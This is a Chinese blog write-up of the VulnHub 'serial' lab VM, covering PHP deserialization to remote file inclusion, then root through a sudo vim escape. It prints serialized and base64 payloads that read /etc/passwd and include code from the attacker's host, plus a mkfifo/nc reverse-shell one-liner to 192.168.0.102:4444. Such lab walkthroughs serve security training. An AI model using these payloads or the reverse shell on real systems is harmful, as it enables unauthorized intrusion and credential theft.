php 靶机,php反序列化靶机serial实战

最新推荐文章于 2024-04-29 10:58:57 发布
最新推荐文章于 2024-04-29 10:58:57 发布
阅读量387 收藏 1
点赞数
文章标签: php 靶机

靶机描述

今天研究一下php反序列化,靶机serial实战。目标为获取root权限。

靶机信息

可以去vulhub上下载此靶机:

https://www.vulnhub.com/entry/serial-1,349/

下载好,之后,使用Vmware新建虚拟机打开,步骤如下:

1.首先创建新的虚拟机。

9666da32182294412ea9e46d09bb738a.png

2.然后选择客户机版本为Ubuntu 64位。

bc9f6ec88a52959d4fe0c359aad0f58c.png

3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。

be27c092ba57e7a322aba235402ee5ba.png

545959d7d60fc719057bf75f9f78537b.png

4.打开虚拟机,环境配置完成。

377ac415cf32f12e27a96409fdae35db.png

渗透测试过程

探测主机存活(目标主机IP地址)

使用nmap探测主机存活或者使用Kali里的netdicover进行探测。

-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测)

扫描到存活主机:192.168.242.129,开放了22和80端口

f32717e6491a86f079993f17d07ccbee.png

访问web服务

1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。

83eae79182ee1deba553aef4555fc4d7.png

2.F12查看,是一串base64编码。

1bb79a9e14ffdc3560b8bc2a48d3b614.png

3.使用burpsuite解码,是一串代码,下面有解释。

2160a91469e57d3ce0df028a3b8baf3b.png

思路一:

尝试逻辑绕过,将sk4换成admin,看看是否有什么信息。

b3f8cbcd7437a40e4ed99776117a019e.png

这里直接报500错误,没办法,只有找其他思路。

5823b14ce58f39caf155b22d8e926011.png

思路二:

目录扫描

1.使用dirbuster工具进行扫描,这里扫到一个/backup/目录。

d402d514f45128c7b305a64d329933ca.png

2.打开查看,是一个zip文件,下载查看,是三个源代码文件。

61f9aa99de9d5b9929abd2cfe34e3e84.png

0ab35dd3b6d8aa32678022ae9147ad3c.png

代码审计

1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

75c8925075ca1b774f1c18cb260eb860.png

2.经过代码审计可构造payload,尝试读取passwd文件,payload如下:

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}},然后在命令行窗口,打开python,添加base64模块,再经序列化和base64编码后,进行执行,但是一直不能成功执行。

54981a7dde9ad796011cb5169927799b.png

4244941a34b5d614674c9d454c1febcb.png

3.通过对比发现base64存在一定的不同,需要进行修改,将空格使用\x00替换,然后再进行编码读取/etc/passwd文件。

这里我们仍然使用python进行操作,首先使用replace()函数将payload中所有的空格替换成\x00:'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}'.replace(' ','\x00'),然后再使用base64模块进行编码:base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}'),编码后的payload如下:Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

70c73267529f3e226aa0f401f9f4e8cb.png

4.然后在burpsuite的repeater模块中,将payload赋值给cookie中的user,然后点击 [go],读取到passwd文件,可以看到可登录系统用户除了root,还有sk4。

7303769ba98dfd8daa0041e7ef7eeae2.png

获取shell

1.因为这样执行命令不太方便,我们可以换一种方式,在本地打开web服务,上传一个txt文件,内容是:。

3a789fc2f845dbba21ef05edccc23fff.png

2.然后构造payload:O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}},然后进行序列化和base64编码执行。

698d7062f480059660fdbd32c3259dc7.png

7e1b31daf3029b8a03e4c4711a59032a.png

命令执行成功。

9ede65a06a14cd41018cb984ba8ca508.png

3.添加反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f,没有回应,但反弹shell成功。

ed05a2cf8eda7c465af29f75690bc06e.png

73624a26266b3574508971071f3f72d2.png

提升权限

1.查看系统版本,内核版本。

52f07ac837dd831f5dc252f14df875cb.png

2.查看根目录发现存在敏感文件credentials.txt.bak。

41ffc2b936a19d3256311378492f142c.png

3.打开查看是用户名和密码,SSH登录。

42e2253a01bb70e3ad76f22c5db8d0b0.png

6898480caf89c9f1dd751f40f4796024.png

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5773755b90b6d2fe3815f1ddcc537bc2.png

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

10015c8d07da12c3d9d19551e6da64bd.png

6.提权成功。

930a2bc26b797455cf9076bf7d5a9375.png

weixin_39552037
关注
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机12:sickos-1.2
wj33333的博客
10-31 175
1.arp-scan -l扫描IP2.nmap 扫描端口查看80端口3.没有发现可用信息,dirsearch扫描目录访问5.网站指纹识别经过在网上搜索,也没有发现web服务器的版本漏洞。
如何查看linux php版本信息,linux,apache,php,mysql常用的查看版本信息的方法
weixin_27972919的博客
03-12 458
标签:linux版本信息phpapachemysql 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://www.voidcn.com/article/p-hwrkgtnp-vs.html1、 查看linux的内核版本,系统信息,常用的有三种办法:uname -a; more /etc/issue; cat /proc/versio...
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 902
一、实验环境 靶机:SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
vulntarget-a靶场复现
weixin_52158313的博客
12-29 990
vulntarget-a靶场复现
综合靶机渗透测试解析
w_j_x_123的博客
05-30 573
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
upload 靶机上传漏洞利用教学(含代码分析).doc
09-16
php 上传漏洞大演练。推荐使用Windows系统搭建,我最先使用docker pull c0ny1/upload-labs的镜像在Pass-03遇到问题,初步判断是该镜像内的php.conf文件配置错误导致。
安装部署Web安全测试用的靶机
11-24
同样地,MCIR、Pikachu、mutillidae和BWAPP的安装过程类似,主要包括创建虚拟主机、配置数据库连接、初始化数据库以及调整访问权限。例如,MCIR的数据库配置在database.config.php文件中,而Pikachu的配置在inc/...
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
使用PHPstudy搭建DVWA靶场
北冥同学的成长记录笔记
04-29 5770
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用平台,旨在为网络安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
phpstudy靶机搭建
最新发布
bbdwjy的博客
04-29 289
第零步:拥有一个虚拟机vm。
php靶机网站,JIS-CTF靶机 Kioptrix靶机渗透
weixin_30679293的博客
03-25 526
前言JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。靶机下载/搭建:靶机1:https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw靶机2:http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar开始:JIS靶机全解:探测网络, IP:192.168.1.135...
vulnhub靶机ha:wordy
weixin_52450702的博客
11-27 994
vulnhub靶机ha:wordy
新版phpstudy搭建pikachu靶场环境详细过程
02-17 2897
新版phpstudy搭建pikachu靶场环境详细过程
Pikachu靶场-PHP反序列化
自强不息,厚德载物
12-31 261
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3821
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
安装phpstudy---测试可用、安装靶机环境、使用burpsuite对靶机环境进行抓包
dyx0910的博客
05-12 906
安装phpstudy---测试可用、安装靶机环境、使用burpsuite对靶机环境进行抓包
web安全攻防演练网站 靶机 测试环境 收集
whatday的专栏
09-09 4227
http://demo.testfire.net http://testphp.vulnweb.com http://testasp.vulnweb.com http://testaspnet.vulnweb.com http://zero.webappsecurity.com http://crackme.cenzic.com http://www.webscantest.com ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值